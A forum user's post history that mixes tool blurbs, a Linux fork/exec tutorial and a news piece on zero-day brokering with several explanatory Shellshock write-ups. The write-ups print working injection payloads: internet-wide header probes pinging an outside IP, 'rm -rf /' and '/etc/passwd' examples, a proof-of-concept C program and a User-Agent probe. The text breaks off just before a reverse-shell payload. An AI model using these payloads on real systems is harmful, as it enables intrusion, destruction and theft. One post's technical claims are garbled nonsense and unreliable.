Everything posted by Nytro

  1. Kickboxing, MMA or Krav Maga.
  2. This one has been fixed as well.
  3. Description: This application is based on MiTeC Portable Executable Reader. It reads and displays executable file properties and structure. It is compatible with PE32 (Portable Executable), PE32+ (64-bit), NE (Windows 3.x New Executable) and VxD (Windows 9x Virtual Device Driver) file types. .NET executables are supported too. For files compiled by Borland compilers, it enumerates introduced classes, used units and forms. It contains a powerful Resource Viewer that is able to analyze and display all basic resource types plus some extra ones such as JPEG, PNG, GIF, AVI and REGISTRY. It contains an excellent Type Library viewer that enumerates all objects and creates an import interface unit in Object Pascal. Every type of resource can be saved to file. EXE Explorer produces a text report with all important information about the selected file. Searching capability is also available: it searches all resources that can be interpreted as text. The following structures are evaluated: DOS, File, Optional and CLR headers; CLR Metadata streams; Sections; Directories; Imports; Exports; Resources; ASCII and Unicode Strings; .NET Metadata; Load Config; Debug; Thread Local Storage; Exceptions; Units; Forms; Packages; Classes; Flags; Version Info; Hexadecimal File Content View. Download: http://www.mitec.cz/Downloads/EXE.zip Source: MiTeC Homepage
  4. Who's volunteering to act as the intermediary? I don't think anyone wants to get tangled up over the 5 dollars they'd be left with from a transaction.
  5. We've lost another comrade... He got married. In this photo: - Nytro - Tinkode - Denjacker (daemien) Guess who's who.
  6. Nytro

    Typo3 CMS

    It's OK. They have an internal security team that fixes issues without them becoming public. It's secure and stable.
  7. New processes are created by the two related interfaces fork and exec.
Fork
When you come to a metaphorical "fork in the road" you generally have two options to take, and your decision affects your future. Computer programs reach this fork in the road when they hit the fork() system call. At this point, the operating system will create a new process that is exactly the same as the parent process. This means all the state that was talked about previously is copied, including open files, register state and all memory allocations, which includes the program code. The return value from the system call is the only way the process can determine if it was the existing process or a new one. The return value to the parent process will be the Process ID (PID) of the child, whilst the child will get a return value of 0. At this point, we say the process has forked and we have the parent-child relationship as described above.
Exec
Forking provides a way for an existing process to start a new one, but what about the case where the new process is not part of the same program as the parent process? This is the case in the shell; when a user starts a command it needs to run in a new process, but it is unrelated to the shell. This is where the exec system call comes into play. exec will replace the contents of the currently running process with the information from a program binary. Thus the process the shell follows when launching a new program is to firstly fork, creating a new process, and then exec (i.e. load into memory and execute) the program binary it is supposed to run.
How Linux actually handles fork and exec
clone
In the kernel, fork is actually implemented by a clone system call. This clone interface effectively provides a level of abstraction in how the Linux kernel can create processes. clone allows you to explicitly specify which parts of the new process are copied into the new process, and which parts are shared between the two processes.
This may seem a bit strange at first, but allows us to easily implement threads with one very simple interface.
Threads
While fork copies all of the attributes we mentioned above, imagine if everything was copied for the new process except for the memory. This means the parent and child share the same memory, which includes program code and data.
Figure 5.4. Threads
The memory (including program code and variables) of the process is shared by the threads, but each has its own kernel state, so they can be running different parts of the code at the same time. This hybrid child is called a thread. Threads have a number of advantages in situations where you might otherwise use fork. Separate processes cannot see each other's memory. They can only communicate with each other via other system calls. Threads, however, share the same memory, so you get the advantages of multiple processes without the expense of having to use system calls to communicate between them. The problem that this raises is that threads can very easily step on each other's toes. One thread might increment a variable, and another may decrease it without informing the first thread. These types of problems are called concurrency problems and they are many and varied. To help with this, there are userspace libraries that help programmers work with threads properly. The most common one is called POSIX threads or, as it is more commonly referred to, pthreads. Switching processes is quite expensive, and one of the major expenses is keeping track of what memory each process is using. By sharing the memory this overhead is avoided and performance can be significantly increased. There are many different ways to implement threads. On the one hand, a userspace implementation could implement threads within a process without the kernel having any idea about it. The threads all look like they are running in a single process to the kernel.
This is suboptimal mainly because the kernel is being withheld information about what is running in the system. It is the kernel's job to make sure that the system resources are utilised in the best way possible, and if what the kernel thinks is a single process is actually running multiple threads, it may make suboptimal decisions. Thus the other method is that the kernel has full knowledge of the thread. Under Linux, this is established by making all processes able to share resources via the clone system call. Each thread still has associated kernel resources, so the kernel can take it into account when doing resource allocations. Other operating systems have a hybrid method, where some threads can be specified to run in userspace only ("hidden" from the kernel) and others might be a lightweight process, a similar indication to the kernel that the process is part of a thread group.
Copy on write
As we mentioned, copying the entire memory of one process to another when fork is called is an expensive operation. One optimisation is called copy on write. This means that, similar to threads above, the memory is actually shared, rather than copied, between the two processes when fork is called. If the processes are only going to be reading the memory, then actually copying the data is unnecessary. However, when a process writes to its memory, it needs to be a private copy that is not shared. As the name suggests, copy on write optimises this by only doing the actual copy of the memory at the point when it is written to. Copy on write also has a big advantage for exec. Since exec will simply be overwriting all the memory with the new program, actually copying the memory would waste a lot of time. Copy on write saves us actually doing the copy.
The init process
We discussed the overall goal of the init process previously, and we are now in a position to understand how it works.
On boot the kernel starts the init process, which then forks and execs the system's boot scripts. These fork and exec more programs, eventually ending up forking a login process. The other job of the init process is "reaping". When a process calls exit with a return code, the parent usually wants to check this code to see if the child exited correctly or not. However, this exit code is part of the process which has just called exit. So the process is "dead" (i.e. not running) but still needs to stay around until the return code is collected. A process in this state is called a zombie (the traits of which you can contrast with a mystical zombie!). A process stays a zombie until the parent collects the return code with the wait call. However, if the parent exits before collecting this return code, the zombie process is still around, waiting aimlessly to give its status to someone. In this case, the zombie child will be reparented to the init process, which has a special handler that reaps the return value. Thus the process is finally free and its descriptor can be removed from the kernel's process table.
Zombie example
Example 5.3. Zombie example process

$ cat zombie.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
    pid_t pid;

    printf("parent : %d\n", getpid());

    pid = fork();

    if (pid == 0) {
        printf("child : %d\n", getpid());
        sleep(2);
        printf("child exit\n");
        exit(1);
    }

    /* in parent */
    while (1)
    {
        sleep(1);
    }
}

ianw@lime:~$ ps ax | grep [z]ombie
16168 pts/9 S 0:00 ./zombie
16169 pts/9 Z 0:00 [zombie] <defunct>

Above we create a zombie process. The parent process will sleep forever, whilst the child will exit after a few seconds. Below the code you can see the results of running the program. The parent process (16168) is in state S for sleep (as we expect) and the child is in state Z for zombie.
The ps output also tells us that the process is defunct in the process description.[16]
[16] The square brackets around the "z" of "zombie" are a little trick to remove the grep process itself from the ps output. grep interprets everything between the square brackets as a character class, but because the process name will be "grep [z]ombie" (with the brackets) this will not match!
Source: Fork and Exec
  8. The WPScan software and its data (henceforth both referred to simply as "WPScan") is dual-licensed - copyright 2011-2014 The WPScan Team. Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, the system can be used under the terms of the GNU General Public License.
Cases of commercialization are:
- Using WPScan to provide commercial managed/Software-as-a-Service services.
- Distributing WPScan as a commercial product or as part of one.
Cases which do not require a commercial license, and thus fall under the terms of the GNU General Public License, include (but are not limited to):
- Penetration testers (or penetration testing organizations) using WPScan as part of their assessment toolkit, so long as that does not conflict with the commercialization clause.
- Using WPScan to test your own systems.
- Any non-commercial use of WPScan.
If you need to acquire a commercial license, or are unsure about whether you need one, please get in touch; we will be happy to clarify things for you and work with you to accommodate your requirements. wpscanteam at gmail.com
You should have received a copy of the GNU General Public License along with this program. If not, see Licenses - GNU Project - Free Software Foundation.
[h=4]INSTALL[/h]
WPScan comes pre-installed on the following Linux distributions:
- BackBox Linux
- Kali Linux
- Pentoo
- SamuraiWTF
- ArchAssault
Prerequisites:
- Ruby >= 1.9.2 - Recommended: 2.1.2
- Curl >= 7.21 - Recommended: latest (FYI, 7.29 has a segfault)
- RubyGems - Recommended: latest
- Git
Windows is not supported.
Source: https://github.com/wpscanteam/wpscan
  9. It's easy to exploit on a single server, but things get complicated for multiple servers. For example, a classic (){:;}; rm -rf / won't work on just any server, because many servers have SELinux on top of the kernel, and grsecurity stops the exploitation right from network layer 2! The only thing you can try is a privilege escalation exploit in which, by controlling the ESP, you modify the memory page containing that script and thus bypass it by switching the protocol from TCP to ICMP. But you can imagine how hard it is to pull that off, especially since there are a lot of kernel versions, and to make it compatible you'd have to find signatures for the functions and IOCTLs that control the SSDT and validate code integrity... In other words, you're better off reading the articles and trying to understand them; it's not that hard.
  10. It's never going to work anyway. Have you even read a single article about the issue? You know, that "() {" thing?
  11. There are 6 detailed articles about this issue here: https://rstforums.com/forum/tutoriale-engleza.rst
  12. An HTTP request with the User-Agent/Cookie/Referer set to a function that runs ping/curl/wget, for example. Or cat /etc/passwd. Or prints something, anything.
  13. Nytro

    Kartoffel

    Kartoffel is an extensible command-line tool developed with the aim of helping developers test the security and reliability of a driver. Kartoffel exposes most of its features via the static library kartolib, so you can build your own K-plugins to test exploits or PoCs, simulate I/O requests, or develop stand-alone programs. Source: Kartoffel - Secure Your Driver
  14. SpoofMAC - Spoof your MAC address
For OS X, Windows, and Linux (most flavors). I made this because changing your MAC address in Mac OS X is harder than it should be. The biggest annoyance is that the Wi-Fi card (Airport) needs to be manually disassociated from any connected networks in order for the change to be applied correctly. Doing this manually every time is tedious and lame. Instead of doing that, just run this Python script and change your MAC address in one command. Now for Windows and Linux, too!
Installation
You can install from PyPI using pip or easy_install:
pip install SpoofMAC
easy_install SpoofMAC
or clone/download the repository and install with setup.py. Ex:
git clone git://github.com/feross/SpoofMAC.git
cd SpoofMAC
python setup.py install
If you're not using the system Python (because you use Homebrew, for example), make sure you add '/usr/local/share/python/' (or equivalent) to your path. Or, consider using spoof, a node.js port of this package.
Source: https://github.com/feross/SpoofMAC
  15. Kevin Mitnick, Once the World’s Most Wanted Hacker, Is Now Selling Zero-Day Exploits By Andy Greenberg 09.24.14 | 11:41 am | Permalink Mitnick showing a keylogging device to a crowd in 2010. Credit: Eneas De Troya | CC BY As a young man, Kevin Mitnick became the world’s most notorious black hat hacker, breaking into the networks of companies like IBM, Nokia, Motorola, and other targets. After a stint in prison, he reinvented himself as a white hat hacker, selling his skills as a penetration tester and security consultant. With his latest business venture, Mitnick has switched hats again: This time to an ambiguous shade of gray. Late last week, Mitnick revealed a new branch of his security consultancy business he calls Mitnick’s Absolute Zero Day Exploit Exchange. Since its quiet inception six months ago, he says the service has offered to sell corporate and government clients high-end “zero-day” exploits, hacking tools that take advantage of secret bugs in software for which no patch yet exists. Mitnick says he’s offering exploits developed both by his own in-house researchers and by outside hackers, guaranteed to be exclusive and priced at no less than $100,000 each, including his own fee. And what will his clients do with those exploits? “When we have a client that wants a zero-day vulnerability for whatever reason, we don’t ask, and in fact they wouldn’t tell us,” Mitnick tells WIRED in an interview. “Researchers find them, they sell them to us for X, we sell them to clients for Y and make the margin in between.” Mitnick declined to name any of his customers, and wouldn’t say how many, if any, exploits his exchange has brokered so far. 
But the website he launched to reveal the project last week offers to use his company’s “unique positioning among security researchers and the hacker community” to connect exploit developers with “discerning government and corporate buyers.” As the zero day market has come to light over the last several years, freelance hackers’ sale of potential surveillance tools to government agencies has become a hotly debated ethical quandary in the security community. The notion of Kevin Mitnick selling those tools could be particularly eyebrow-raising; after all, Mitnick became a symbol of government oppression in the late 1990s, when he spent four and a half years in prison and eight months in solitary confinement before his trial on hacking charges. The outcry generated a miniature industry in “Free Kevin” T-shirts and bumper stickers. Enabling targeted surveillance also clashes with Mitnick’s new image as a privacy advocate; his forthcoming book titled “The Art of Invisibility” promises to teach readers “cloaking and countermeasures” against “Big Brother and big data.” “It’s like an Amazon wish list of exploits.” He says his intended customers aren’t necessarily governments. Instead, he points to penetration testers and antivirus firms as potential exploit buyers, and even suggests that companies might pay him for vulnerabilities in their own products. “I’m not interested in helping government agencies spy on people,” he says. “I have a unique history with the government. These are the same people who locked me in solitary because they thought I could whistle nuclear launch codes.” Still, the six-figure fees Mitnick names on his site are far more than most buyers would pay for mere defensive purposes. (Though his website names a minimum price of $200,000, Mitnick says that’s an error, and that he’s willing to deal in exploits worth half that much.)
Companies like Facebook and PayPal generally pay tens of thousands of dollars at most for information about bugs in their products, though Google occasionally pays as much as $150,000 in hacking contest prizes. Mitnick’s exploit exchange seems designed to cater particularly to high-end buyers. It lists two options: Absolute X, which lets clients pay for exclusive use of whatever hacking exploits Mitnick’s researchers dig up, and Absolute Z, a more premium service that seeks to find new zero-days that target whatever software the client chooses. “We have some clients that give us a menu of what they’re looking for, like ‘We’re looking for an exploit in this version of Chrome,’” he says. “It’s like an Amazon wish list of exploits.” Mitnick is far from the only hacker to see an opportunity in the growing grey market for zero days. Other firms like Vupen, Netragard, Exodus Intelligence, and Endgame Systems have all sold or brokered secret hacking techniques. While the trade is legal, critics have argued that the services’ lax customer policies make it possible for repressive regimes or even criminals to gain access to dangerous hacking tools. But Mitnick counters that he’ll carefully screen his buyers. “I wouldn’t consider in a million years selling to a government like Syria or to a criminal organization,” he says. “Customers want to buy this information, and they’ll pay a certain price. If they pass our screening process, we’ll work with them.” As an ex-convict, Mitnick’s entrance into the zero-day market may mean he’ll face extra scrutiny himself. From his teens to his early 30s, after all, Mitnick went on an epic intrusion spree through the networks of practically every major tech firm of the day, including Digital Equipment, Sun Microsystems, Silicon Graphics, and many more. For two and a half years, he led the FBI on a manhunt that made him the most wanted hacker in the world at the time of his arrest in 1995.
ACLU technologist Chris Soghoian, a vocal critic of the zero-day exploit business, used that criminal past to take a jab at Mitnick on Twitter following his announcement of the bug-selling brokerage. Mitnick shot back: “My clients may use them to monitor your activities? How do you like them apples, Chris?” Source: Kevin Mitnick, Once the World's Most Wanted Hacker, Is Now Selling Zero-Day Exploits | WIRED
  16. Thursday, September 25, 2014
Remember Heartbleed? If you believe the hype today, Shellshock is in that league and with an equally awesome name, albeit bereft of a cool logo (someone in the marketing department of these vulns needs to get on that). But in all seriousness, it does have the potential to be a biggie and, as I did with Heartbleed, I wanted to put together something definitive, both for me to get to grips with the situation and for others to dissect the hype from the true underlying risk. To set the scene, let me share some content from Robert Graham's blog post; he has been doing some excellent analysis on this. Imagine an HTTP request like this:
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (Errata Security: Bash 'shellshock' scan of the Internet)
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74
http-header = Host:() { :; }; ping -c 3 209.126.230.74
http-header = Referer:() { :; }; ping -c 3 209.126.230.74
Which, when issued against a range of vulnerable IP addresses, results in this: Put succinctly, Robert has just orchestrated a bunch of external machines to ping him simply by issuing a carefully crafted request over the web. What's really worrying is that he has effectively caused these machines to issue an arbitrary command (albeit a rather benign ping) and that opens up a whole world of very serious possibilities. Let me explain.
What is Bash and why do we need it?
Skip this if it's old news, but context is important for those unfamiliar with Bash, so let's establish a baseline understanding. Bash is a *nix shell or, in other words, an interpreter that allows you to orchestrate commands on Unix and Linux systems, typically by connecting over SSH or Telnet. It can also operate as a parser for CGI scripts on a web server such as we'd typically see running on Apache.
It's been around since the late 80s, when it evolved from earlier shell implementations (the name is derived from the Bourne shell), and is enormously popular. There are other shells out there for Unix variants; the thing about Bash though is that it's the default shell for Linux and Mac OS X, which are obviously extremely prevalent operating systems. That's a major factor in why this risk is so significant – the ubiquity of Bash – and it's being described as "one of the most installed utilities on any Linux system". You can get a sense of the Bash footprint when you look at the latest Netcraft web server stats: When half the net is running Apache (which is typically found on Linux), that's a significant slice of a very, very large pie. That same Netcraft article is reporting that we've just passed the one billion websites mark too and whilst a heap of those are sharing the same hosts, that's still a whole lot of Bash installations. Oh – that's just web servers too, don't forget there are a heap of other servers running Linux and we'll come back to other devices with Bash a bit later too. Bash can be used for a whole range of typical administrative functions, everything from configuring websites through to controlling embedded software on a device like a webcam. Naturally this is not functionality that's intended to be open to the world and in theory, we're talking about authenticated users executing commands they've been authorised to run. In theory.
What's the bug?
Let me start with the CVE from NIST vulnerability database because it gives a good sense of the severity (highlight mine): GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. They go on to rate it a “10 out of 10” for severity or in other words, as bad as it gets. This is compounded by the fact that it’s easy to execute the attack (access complexity is low) and perhaps most significantly, there is no authentication required when exploiting Bash via CGI scripts. The summary above is a little convoluted though so let’s boil it down to the mechanics of the bug. The risk centres around the ability to arbitrarily define environment variables within a Bash shell which specify a function definition. The trouble begins when Bash continues to process shell commands after the function definition resulting in what we’d classify as a “code injection attack”. Let’s look at Robert’s example again and we’ll just take this line: http-header = Cookie:() { :; }; ping -c 3 209.126.230.74 The function definition is () { :; }; and the shell command is the ping statement and subsequent parameters. When this is processed within the context of a Bash shell, the arbitrary command is executed. In a web context, this would mean via a mechanism such as a CGI script and not necessarily as a request header either. It’s worth having a read through the seclists.org advisory where they go into more detail, including stating that the path and query string could be potential vectors for the attack. 
Of course one means of mitigating this particular attack vector is simply to disable any CGI functionality that makes calls to a shell and indeed some are recommending this. In many cases though, that's going to be a seriously breaking change and at the very least, one that's going to require some extensive testing to ensure it doesn't cause immediate problems in the website, which in many cases it will. The HTTP proof above is a simple but effective one, albeit just one implementation over a common protocol. Once you start throwing in Telnet and SSH and apparently even DHCP, the scope increases dramatically, so by no means are we just talking about exploiting web app servers here. (Apparently the risk is only present in SSH post-auth, but at such an early stage of the public disclosure we'll inevitably see other attack vectors emerge.) What you also need to remember is that the scope of potential damage stretches well beyond pinging an arbitrary address as in Robert's example; that's simply a neat little proof that he could orchestrate a machine to issue a shell command. The question becomes this: what damage could an attacker do when they can execute a shell command of their choosing on any vulnerable machine?
What are the potential ramifications?
The potential is enormous – "getting shell" on a box has always been a major win for an attacker because of the control it offers them over the target environment. Access to internal data, reconfiguration of environments, publication of their own malicious code etc. It's almost limitless and it's also readily automatable. There are many, many examples of exploits out there already that could easily be fired off against a large volume of machines. Unfortunately, when it comes to arbitrary code execution in a shell on up to half the websites on the internet, the potential is pretty broad. One of the obvious (and particularly nasty) ones is dumping internal files for public retrieval.
Password files and configuration files with credentials are the obvious ones, but this could conceivably extend to any other files on the system. Likewise, the same approach could be applied to write files to the system. This is potentially the easiest website defacement vector we've ever seen, not to mention a very easy way of distributing malware. Or how about this: one word I keep seeing a lot is "worm". When we talk about a worm in a malicious computing context, we're talking about a self-replicating attack where a malicious actor creates code that is able to propagate across targets. For example, we saw a very effective implementation of this with Samy's MySpace XSS Worm, where some carefully crafted JavaScript managed to "infect" a million victims' pages in less than a day. The worry with Shellshock is that an attack of this nature could replicate at an alarming rate, particularly early on while the majority of machines remain at risk. In theory, this could take the form of an infected machine scanning for other targets and propagating the attack to them. This would be by no means limited to public facing machines either; get this behind the corporate firewall and the sky's the limit. People are working on exploiting this right now. This is what makes these early days so interesting, as the arms race between those scrambling to patch and those scrambling to attack heats up.
Which versions of Bash are affected?
The headlines state everything through 4.3 or, in other words, about 25 years' worth of Bash versions. Given everyone keeps comparing this to Heartbleed, consider that the impacted versions of OpenSSL spanned a mere two years, which is a drop in the ocean compared to Shellshock. Yes, people upgrade their versions, but no, they don't do it consistently, and whichever way you cut it, the breadth of at-risk machines is going to be significantly higher with Shellshock than it was with Heartbleed. But the risk may well extend beyond 4.3 as well.
Already we're seeing reports of patches not being entirely effective and given the speed with which they're being rolled out, that's not all that surprising. This is the sort of thing those impacted by it want to keep a very close eye on, not just "patch and forget".
When did we first learn of it and how long have we been at risk?
The first mention I've found on the public airwaves was this very brief summary on seclists.org, which works out at about 18:00 GMT on Wednesday (about 2am today for those of us on the eastern end of Australia). The detail came in the advisory I mentioned earlier an hour later, so getting towards late afternoon Wednesday in Europe or the middle of the day in the US. It's still very fresh news with all the usual press speculation and Chicken Little predictions; it's too early to observe any widespread exploitation in the wild, but that could also come very soon if the risk lives up to its potential. Scroll back beyond just what has been disclosed publicly and the bug was apparently discovered last week by Stéphane Chazelas, a "Unix/Linux, network and telecom specialist" bloke in the UK. Having said that, in Akamai's post on the bug, they talk about it having been present for "an extended period of time" and of course vulnerable versions of Bash go back two and a half decades now. The question, as with Heartbleed, will be whether or not malicious actors were aware of this before now and indeed whether they were actively exploiting it.
Are our "things" affected?
This is where it gets interesting – we have a lot of "things" potentially running Bash. Of course when I use this term I'm referring to the "Internet of Things" (IoT), which is the increasing prevalence of whacking an IP address and a wireless adaptor into everything from our cutlery to our door locks to our light globes. Many IoT devices run embedded Linux distributions with Bash.
These very same devices have already been shown to demonstrate serious security vulnerabilities in other areas, for example LIFX light globes just a couple of months ago were found to be leaking wifi credentials. Whilst not a Bash vulnerability like Shellshock, it shows us that by connecting our things we're entering a whole new world of vulnerabilities in places that were never at risk before. This brings with it many new challenges; for example, who is actively thinking they should regularly patch their light bulbs? Also consider the longevity of the devices this software is appearing in and whether they're actually actively maintained. In a case like the vulnerable Trendnet cameras from a couple of years ago, there are undoubtedly a huge number of them still sitting on the web because in terms of patching, they're pretty much a "set and forget" proposition. In fact in that case there's an entire Twitter account dedicated to broadcasting the images it has captured of unsuspecting owners of vulnerable versions. It's a big problem with no easy fixes and it's going to stick with us for a very long time. But Bash shells are also present in many more common devices, for example our home routers, which are generally internet-facing. Remember when you last patched the firmware on your router? Ok, if you're reading this then maybe you're the type of technical person who actually does patch their router, but put yourself in the shoes of Average Joe Consumer and ask yourself that again. Exactly.
All our things are on the Microsoft stack, are we at risk?
Short answer "no", long answer "yes". I'll tackle the easy one first – Bash is not found natively on Windows and whilst there are Bash implementations for Windows, it's certainly not common and it's not going to be found on consumer PCs. It's also not clear if products like win-bash are actually vulnerable to Shellshock in the first place.
The longer answer is that just because you operate in a predominantly Microsoft-centric environment doesn’t mean that you don’t have Bash running on machines servicing other discrete purposes within that environment. When I wrote about Heartbleed, I referenced Nick Craver’s post on moving Stack Overflow towards SSL and referred to this diagram of their infrastructure:

There are non-Microsoft components sitting in front of their Microsoft application stack, components that the traffic needs to pass through before it hits the web servers. These are also components that may have elevated privileges behind the firewall – what’s the impact if Shellshock is exploited on those? It could be significant and that’s the point I’m making here; Shellshock has the potential to impact assets beyond just at-risk Bash implementations when it exists in a broader ecosystem of other machines.

I’m a system admin – what can I do?

Firstly, discovering if you’re at risk is trivial as it’s such an easily reproducible risk. There’s a very simple test The Register suggests which is just running this command within your shell:

env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"

If you get “busted” echoed back out, you’ve successfully exploited the bug.

Of course the priority here is going to be patching at-risk systems and the patch essentially boils down to ensuring no code can be executed after the end of a Bash function. Linux distros such as Red Hat are releasing guidance on patching the risk so jump on that as a matter of priority. We’ll inevitably also see definitions for intrusion detection systems too and certainly there will be common patterns to look for here. That may well prove a good immediate-term implementation for many organisations, particularly where there may be onerous testing requirements before rolling out patches to at-risk systems. 
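That one-liner can be wrapped into a small pass/fail script for checking several hosts or shells. This is a minimal sketch of my own, not part of The Register's test; the SHELL_UNDER_TEST variable is a hypothetical knob for pointing the check at a specific binary such as /bin/bash.

```shell
# Wraps the environment-variable test into a pass/fail check.
# SHELL_UNDER_TEST is a hypothetical knob (not part of the original test);
# it defaults to /bin/sh, the shell used by system() and popen().
SHELL_UNDER_TEST="${SHELL_UNDER_TEST:-/bin/sh}"

# Run a benign command with the crafted variable in the environment and
# capture everything the child shell prints.
out=$(env X='() { :;} ; echo busted' "$SHELL_UNDER_TEST" -c 'echo stuff' 2>/dev/null)

case "$out" in
  *busted*) echo "VULNERABLE: $SHELL_UNDER_TEST executed trailing code from the environment" ;;
  *)        echo "OK: $SHELL_UNDER_TEST ignored the crafted variable" ;;
esac
```

A patched (or non-bash) shell prints the OK line; a vulnerable bash prints the VULNERABLE line, because the `echo busted` after the function body ran at startup.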
Qualys is aiming to have a definition to detect the attack pretty quickly and inevitably other IDS providers are working on this around the clock as well. Other more drastic options include replacing Bash with an alternate shell implementation or cordoning off at-risk systems, both of which could have far-reaching ramifications and are unlikely to be decisions taken lightly. But that’s probably going to be the nature of this bug for many people – hard decisions that could have tangible business impact in order to avoid potentially much more significant ramifications.

The other issue which will now start to come up a lot is the question of whether Shellshock has already been exploited in an environment. This can be hard to determine if there’s no logging of the attack vectors (there often won’t be if it’s passed by HTTP request header or POST body), but it’s more likely to be caught than with Heartbleed when, short of full-on pcaps, the heartbeat payloads would not normally have been logged anywhere. But still, the most common response to “were we attacked via Shellshock” is going to be this:

unfortunately, this isn't "No, we have evidence that there were no compromises;" rather, "we don't have evidence that spans the lifetime of this vulnerability." We doubt many people do - and this leaves system owners in the uncomfortable position of not knowing what, if any, compromises might have happened.

Let the speculation about whether the NSA was in on this begin…

I’m a consumer – what can I do?

It depends. Shellshock affects Macs so if you’re running OS X, at this stage that appears to be at risk which on the one hand is bad due to the prevalence of OS X but on the other hand will be easily (and hopefully quickly) remediated due to a pretty well-proven update mechanism (i.e. Apple can remotely push updates to the machine). 
If you’re on a Mac, the risk is easily tested for as described in this Stack Exchange answer. It’s an easy test, although I doubt the average Mac user is going to feel comfortable stepping through the suggested fix which involves recompiling Bash.

The bigger worry is the devices with no easy patching path, for example your router. Short of checking in with the manufacturer’s website for updated firmware, this is going to be a really hard nut to crack. Often routers provided by ISPs are locked down so that consumers aren’t randomly changing either config or firmware and there’s not always a remote upgrade path they can trigger either. Combine that with the massive array of devices and ages that are out there and this could be particularly tricky. Of course it’s also not the sort of thing your average consumer is going to be comfortable doing themselves either.

In short, the advice to consumers is this: watch for security updates, particularly on OS X. Also keep an eye on any advice you may get from your ISP or other providers of devices you have that run embedded software. Do be cautious of emails requesting information or instructing you to run software – events like this are often followed by phishing attacks that capitalise on consumers’ fears. Hoaxes presently have people putting their iPhones in the microwave so don’t for a moment think that they won’t run a random piece of software sent to them via email as a “fix” for Shellshock!

Summary

In all likelihood, we haven’t even begun to fathom the breadth of this vulnerability. Of course there are a lot of comparisons being made to Heartbleed and there are a number of things we learned from that exercise. One is that it took a bit of time to sink in as we realised the extent to which we were dependent on OpenSSL. The other is that it had a very long tail – months after it hit there were still hundreds of thousands of known hosts left vulnerable. 
But in one way, the Heartbleed comparison isn’t fair – this is potentially far worse. Heartbleed allowed remote access to a small amount of data in the memory of affected machines. Shellshock is enabling remote code injection of arbitrary commands pre-auth which is potentially far more dire. In that regard, I have to agree with Robert:

It’s very, very early days yet – only half a day since it first hit the airwaves at the time of writing – and I suspect that so far we’re only scratching the surface of what is yet to come.

Sursa: Troy Hunt: Everything you need to know about the Shellshock Bash bug
17. CVE-2014-6271 / Shellshock & How to handle all the shells!

Posted by Joel Eriksson, 2014-09-25

For the TL;DR generation: If you just want to know how to handle all the shells, search for “handling all the shells” and skip down to that.

CVE-2014-6271, also known as “Shellshock”, is quite a neat little vulnerability in Bash. It relies on a feature in Bash that allows child processes to inherit shell functions that were defined in the parent. I have played around with this feature before, many years ago, since it could be abused in another way in cases where SUID programs execute external shell scripts (or use system()/popen(), when /bin/bash is the default system shell) and with certain daemons that support environment variable passing.

When a SUID program is the target, the SUID program must first do something like setuid(geteuid()) for this to be exploitable, since inherited shell functions are not accepted when the UID differs from the EUID. When SUID programs call out to shell script helpers (that need to be executed with elevated privileges) this is usually done, since most shells automatically drop privileges when starting up. In those cases, it was possible to trick Bash into executing a malicious shell function even when PATH is set explicitly to a “safe” value, or even when the full path is used for all calls to external programs. This was possible due to Bash happily accepting slashes within shell function names.

This example demonstrates this problem, as well as the new (and much more serious) CVE-2014-6271 vulnerability. 
je@tiny:~$ cat > bash-is-fun.c
/* CVE-2014-6271 + aliases with slashes PoC - je [at] clevcode [dot] org */

#include <unistd.h>
#include <stdio.h>

int main()
{
    char *envp[] = {
        "PATH=/bin:/usr/bin",
        "/usr/bin/id=() { "
        "echo pwn me twice, shame on me; }; "
        "echo pwn me once, shame on you",
        NULL
    };
    char *argv[] = { "/bin/bash", NULL };
    execve(argv[0], argv, envp);
    perror("execve");
    return 1;
}
^D
je@tiny:~$ gcc -o bash-is-fun bash-is-fun.c
je@tiny:~$ ./bash-is-fun
pwn me once, shame on you
je@tiny:/home/je$ /usr/bin/id
pwn me twice, shame on me

As you can see, the environment variable named “/usr/bin/id” is set to “() { cmd1; }; cmd2”. Due to the CVE-2014-6271 vulnerability, any command that is provided as “cmd2” will be immediately executed when Bash starts. Due to the peculiarity I was already familiar with, the “cmd1” part is executed when trying to run id in a “secure” manner by providing the full path.

One of the possibilities that crossed my mind when I got to know about this vulnerability was to exploit this over the web, due to CGI programs using environment variables to pass various information that can be arbitrarily controlled by an attacker. For instance, the user-agent string is normally passed in the HTTP_USER_AGENT environment variable. It turns out I was not alone in thinking about this though, and shortly after information about the “Shellshock” vulnerability was released, Robert Graham at Errata Security started scanning the entire internet for vulnerable web servers. Turns out there are quite a few of them.

The scan is quite limited in the sense that it only discovers cases where the default page (GET /) of the default virtual host is vulnerable, and it only uses the Host-, Referer- and Cookie-headers. Another convenient header to use is the User-Agent one, that is normally passed in the HTTP_USER_AGENT variable. 
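To make the User-Agent vector concrete, here is what such a probe looks like on the wire. This is a hedged sketch of mine rather than something from the article: the host, CGI path and payload are all hypothetical, and with a real (authorized) target the request could be sent with netcat or with curl's -A option.

```shell
# Build the raw HTTP request a Shellshock scanner would send via the
# User-Agent header; the web server copies the raw value into the
# HTTP_USER_AGENT environment variable before the CGI handler starts.
payload='() { :; }; echo Content-Type: text/plain; echo; /usr/bin/id'

printf 'GET /cgi-bin/status.sh HTTP/1.1\r\nHost: target.example\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n' \
    "$payload"
```

On a vulnerable host, the injected `/usr/bin/id` output would come back in the HTTP response body.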
Another way to find lots and lots of potentially vulnerable targets is to do a simple Google search for “inurl:cgi-bin filetype:sh” (without the quotes). As you may have realized by now, the impact of this vulnerability is enormous.

So, now to the part of handling all the shells. Let’s say you are testing a large subnet (or the entire internet) for this vulnerability, and don’t want to settle with a ping -c N ADDR payload, as the one Robert Graham used in his PoC. A simple netcat listener is obviously no good, since that will only be useful to deal with a single reverse shell. My solution gives you as many shells as the amount of windows tmux can handle (a lot).

Let’s assume you want a full reverse-shell payload, and let’s also assume that you want a full shell with job control and a pty instead of the less convenient one you usually get under these circumstances. Assuming a Python interpreter is installed on the target, which is usually a pretty safe bet nowadays, I would suggest a payload such as this (with ADDR and PORT replaced with your IP and port number, of course):

